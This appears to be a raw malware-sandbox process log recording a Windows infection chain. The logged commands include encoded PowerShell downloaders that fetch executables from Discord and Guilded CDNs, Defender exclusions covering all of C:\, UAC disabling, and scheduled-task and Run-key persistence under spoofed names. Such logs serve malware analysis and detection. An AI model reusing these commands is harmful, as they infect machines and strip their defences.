"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\6rs03E3DBT.exe

C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5188 -ip 5188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 804

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\bc3b6a24-a93b-46f3-91a4-21d08640e91e.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Users\Admin\AppData\Local\Temp\91Il4syZBD.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Users\Admin\AppData\Local\Temp\mXX07C3PIi.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Users\Admin\AppData\Local\Temp\8HlGtampXm.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Users\Admin\AppData\Local\Temp\V9HhQcsTse.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\UhDeflkK5l.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADMAMwAyADUANwA2ADcAMgA4ADIANgAvAE8AcABlAHIAYQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGwAYgB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgB2AG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATwBwAGUAcgBhAEMAcgB0AC4AZQB4AGUAJwApACkAPAAjAGQAagBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGQAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBPAHAAZQByAGEAQwByAHQALgBlAHgAZQAnACkAPAAjAGwAaABkACMAPgA="

C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Users\Admin\AppData\Local\Temp\0FY1MDXEPn.exe

C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

"C:\Users\Admin\AppData\Roaming\2WinDefault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1748 -ip 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

"C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

"C:\Users\Admin\AppData\Roaming\OperaCrt.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap6908:1456:7zEvent30571 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp\Temp.zip"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff8e2349758,0x7ff8e2349768,0x7ff8e2349778

C:\Program Files\Google\Chrome\Application\chrome.exe

